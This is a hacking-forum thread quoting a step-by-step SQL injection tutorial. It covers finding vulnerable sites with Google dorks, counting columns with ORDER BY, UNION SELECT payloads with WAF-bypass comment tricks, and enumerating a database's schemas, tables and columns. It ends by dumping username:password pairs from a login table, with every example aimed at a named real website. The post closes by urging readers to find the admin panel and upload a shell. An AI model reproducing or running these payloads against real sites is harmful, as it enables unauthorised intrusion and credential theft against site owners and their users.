Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


sql injection explained

  • 1 Vote(s) - 5 Average


07-08-2014, 01:56 AM #11
black-hat Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:18 Threads:2 Joined:Jun 2014 Reputation: 2
Mood: Stoned
goood
shot thats nice

07-04-2017, 10:15 PM #12
833M0L3 Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2017 Reputation: 0
Mood: None
(06-08-2013, 05:19 AM)madcodE Wrote:  assalamualaikum
madcode haxor here from madleets.com Smiley1
in my previous article ...

http://www.madleets.com/Thread-WORKING-W...By-madcode


we see how we create databases,tables,columns, and add record in it in different ways and now
in this article , we will be covering on SQL injections ... how we can hack using sql injection

please rep+ if you like it .. it took my 1 hour to complete
what is sql injection???

SQL injection is a very common method of hacking websies in this era..
well, sql injection is a big thing, newbies think that this is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it can took many books to complete
So what you can DO with SQL injection
You can access records,
you can modify records
you can bypass Login areas
You can breach sql server

okay here our first step begins

Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

etc there is a huge list of dorks

now if you search anyone of these.. you will find many websites,,, open any of them
and you will see url like


Code:
website.com/index.php?id=1

this could be random
okay to test that if site is vulnerable, just put a ' at the end of url
and make it look like


Code:
website.com/index.php?id=1'


and if you see some error like

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any mysql error... etc or if you see any content of page missing
then the site is vulnerable

example

[Image: lgtf2af.png]

you see its mysql error..so the website is vulnerable Smiley1

So now lets move to next step

EXPLOITING the vulnerablity

now so we have find vuln website..its time to fetching secret data Biggrinsmiley

so what is our next step Smiley1 to find the number of columns in the table

for that we replace ' with order by statment

like

Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--


we need to increase the order by number till we get some error like
unknown column numbers or we found some content missing in the page

example

Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE


SO NOW WE SEE THAT WE GOT ERROR AT ORDER BY 21 , BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS wink

some times this thing never works, we dont get error even at order by 1000
in that case we put ' at the end of id / parameter and put + at the end
like

Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error


now next step begins Biggrinsmiley

Union Select

NOW, we know we have 20 columns, now its time to select all the columns using union select
select statment is use to view data , if you want to learn more about sql, you can check my
article on working with SQL..
oka for now

we use statment like


Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


now you will see any DIGIT of columns on page
like 1 5 7 or anyone
if you dont see, place - before parameter value
example


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


you can see in below picture

you can see 3 and 4 on the web page .. these two are string columns..
we can retrieve our data in these columns

sometimes union select dont work due to WAF (web app firewall) ,, we add comments in our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3�

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3�

or change case

/*!UnIOn*//*!SeLect*/+1,2,3�


etc



[Image: oksohyM.png]


now its time to retrive data in these columns

we can retrive sensitive data .. we can call functions for database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE etc and many more

oka for the tutorial, i will call version function in column 3 and db and user info in
column 4 using group_concat()...

for that i will use

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


I used 0x3a beacause its a hex value of SEMICOLON ( ; ) AND it will seprate two different values of different parameters

now u can see in the image the column 3 and 4 are now replace with values that I called

[Image: mYXScSV.png]

okay .. next thing

how to find all databases in the website ??

okay thats easy

now we need to replace column name with
query like this


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--



see

[Image: lgt73e3.png]

now we know there are basicaly two databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system tables which define
databases.. we can use these tables to look at the database layout style


okay now we have our database ( we dont need to check, we can use its value actually, if we are trying to dump in current database,,, we can use
its function too.. database() instead of cementco_cement.. its needed when we are dumping in outside of current database
but in this case we will be simple dumping)

okay let now lets find the tables in current db

we will use WHERE , condtion in this query now

we will fetch tables with select statement and use where condtion to determine which database tables we want to fetch

okay
syntax


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--


[Image: lgt97a9.png]

now you can see we have all table names Smiley1
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

now we gonna dump in sensitive table
which is login

okay... lets dump it

now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns
and in where condtion we will change table_schema with table_name
and will give parameter of table_name = name of table in qoute like
table_name='login'
why used qoute? because its datatype is varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for that i use hack bar Biggrinsmiley

so now our query looks like

mysql char value of login is CHAR(108, 111, 103, 105, 110)

exmaple


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--


yeahhhh..now we can see columns of table 'login'
which are ...id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

okayy...now the fun begins... time to dump the columns...
for example if we need to dump username and password columns from table 'login' we will replace the query with

select group_concat(username,0x3a,password) from login--
dumped

syntax

Code:
http://www.cementcorporation.co.in/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

[Image: sE3M29s.png]

you can see username:password in the webpage Biggrinsmiley

now just find admin panel and upload the shell Biggrinsmiley

it was easy?? yeah.. but sometime waf can fuff your mind Biggrinsmiley

now .. dealing with error based sql injections

well i have already posted this tutorial here

http://www.madleets.com/Thread-double-qu...tion-video





WE ARE MADLEETS.COM



07-21-2017, 05:01 AM #13
Dr.Goatse Offline Junior Member **
Registered
Posts:15 Threads:2 Joined:Jul 2017 Reputation: 0
Mood: Stoned
Good one bro hope to see more from you  Clapping 68 wink






Forum Jump:


Users browsing this thread:1 Guest(s)